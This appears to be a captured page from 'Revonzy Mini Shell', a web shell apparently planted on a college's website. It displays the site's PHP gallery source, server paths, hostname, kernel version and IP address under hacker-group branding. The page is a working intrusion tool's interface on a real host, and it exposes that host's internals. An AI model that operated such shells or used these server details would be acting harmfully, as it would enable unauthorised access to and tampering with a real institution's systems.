Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/libgallery.php

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();
?>
<html>
<head>
<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" type="text/css" href="css/sidemenu.css"/>

<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
 <script src="js/jquery-1.7.min.js"></script>
    <script src="js/jquery.easing.1.3.js"></script>
    <script src="js/tms-0.4.1.js"></script>

	</head>
	<body>

					<?php
		require_once("lib/header.php");
	?>
	<?php
	require_once('lib/header1.php');
	?>

				
<div class="data_container" style="width:650px;height:800px;float:center;margin-left:10px;border:none;">
	<div class="entry-content">
<h2 style="text-align:justify;font-size:20px;margin-top:5px;font-weight:bold;color:orange;">Library Images :</h2><br />
<br />
			<?php
			
				$report_details = $db->get_all_library_images();
				if(!empty($report_details))
				{
					$counter =0;
					foreach($report_details as $record)
					{
						$id				=	$report_details[$counter][0];
						$images			=	$report_details[$counter][1];
						$description	=	$report_details[$counter][2];
						?>
						<div class="imagg" style="width:200px;display:inline-table;">
						<a href="/gallery/<?php echo $images; ?>" target="_blank"><img src="/gallery/<?php echo $images; ?>" height="120px" width="120px" style="border:1px solid #ccc;padding:5px;margin:10px;"><br />
						<?php echo $description; ?>
						</a>
						</div>
					<?php
						$counter++;
					}
				}
			?>                      
		</div><!-- #content -->
	</div><!-- #primary -->
		
		<?php
		require_once("lib/footer.php");
	?>
		
	    </body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4